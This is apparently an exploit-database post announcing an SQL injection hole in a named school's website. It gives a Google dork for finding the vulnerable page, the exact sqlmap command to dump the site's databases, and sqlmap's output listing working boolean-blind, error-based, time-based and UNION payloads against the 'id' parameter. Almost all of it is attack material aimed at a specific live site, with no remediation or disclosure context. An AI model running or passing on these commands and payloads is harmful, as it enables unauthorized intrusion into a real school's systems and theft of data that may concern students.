############################################################### # Exploit Title : GD Goenka Public School SQL İnjection # Descoverd By : http_v0g3l # Security Risk : Medium # Google Dork : inurl:photo-gallery.php?id= site:gdgoenkaagra.com ############################################################### # Target https://gdgoenkaagra.com/photo-gallery.php?id=29 ############################################################### sqlmap -u https://gdgoenkaagra.com/photo-gallery.php?id=29 --dbs ############################################################### Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=29' AND 4594=4594 AND 'yXRb'='yXRb Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=29' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5612=5612,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dQBU'='dQBU Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=29' AND (SELECT 8541 FROM (SELECT(SLEEP(5)))Qief) AND 'DnAH'='DnAH Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-8289' UNION ALL SELECT NULL,CONCAT(0x71766a7071,0x44634862616b52677459767447526a76525272646e51637874676e495577494444464778596a6c75,0x716b706271),NULL-- - ###############################################################